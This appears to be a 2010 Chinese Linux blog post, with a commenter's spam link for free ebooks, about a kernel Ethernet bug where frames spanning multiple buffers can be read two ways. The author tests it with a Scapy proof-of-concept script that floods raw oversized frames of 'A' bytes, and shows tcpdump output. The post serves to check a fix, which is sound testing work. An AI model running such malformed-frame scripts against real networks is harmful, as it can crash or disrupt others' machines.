分类: LINUX
2010-08-26 15:06:08
Which fixes a DoS when the frame spans multiple buffers and the last buffer
contains less than four bytes. However, if that last fragment is longer than 4
bytes, it will actually be taken into account while the previous fragments will
have been ignored. This means we can end up in a situation where a single
Ethernet frame has multiple interpretation since at some level it will be
considered as a whole and in others the N first bytes will be silently
discarded.
ifconfig eth0 mtu 1000
send.py 1100 srcmac dstmac
and tcpdump -v -X ether src xxx and ether dst xxx and port ! 22
and nothing was shown,the bug is fixed?
thanks hushan
using tcpdump -v -X -n port ! 22 and ! arp and port ! 5353 and ! ip6
22:16:16.455112 41:41:41:41:41:41 41:41:41:41:41:41 4141 76:
0x0000 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0010 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0020 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0030 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAA
the src and dst mac addr is rewrited,far from real hacker!
ps:
send.py
3 # from Fabian Yamaguchi of Recurity Labs
4
5 from scapy.all import *
6 import sys
7
8 def usage():
9 print ''
10 sys.exit()
11
12 if len(sys.argv) != 4:
13 usage()
14
15 FRAMELENGTH = int(sys.argv[1]) + 1
16 SRCMAC = sys.argv[2]
17 DSTMAC = sys.argv[3]
18
19 ETHHEADER = Ether(dst=DSTMAC, src=SRCMAC, type=80)
20
21 for FRAMELENGTH in range(1000,1200):
22 PAYLOADLEN = FRAMELENGTH - len(ETHHEADER)
23
24 # Generate payload
25
26 payload = ''
27 for k in range(1,PAYLOADLEN):
28 payload = payload + 'A'
29
30 # Create ethernet-frame
31 pkt = ETHHEADER / Raw(payload)
32
33 print len(pkt)
34 # Send ethernet-frame
35 # sendp(pkt, iface="eth4")
36 sendp(pkt)
chinaunix网友2010-08-28 14:48:40
Download More than 1000 free IT eBooks: http://free-ebooks.appspot.com
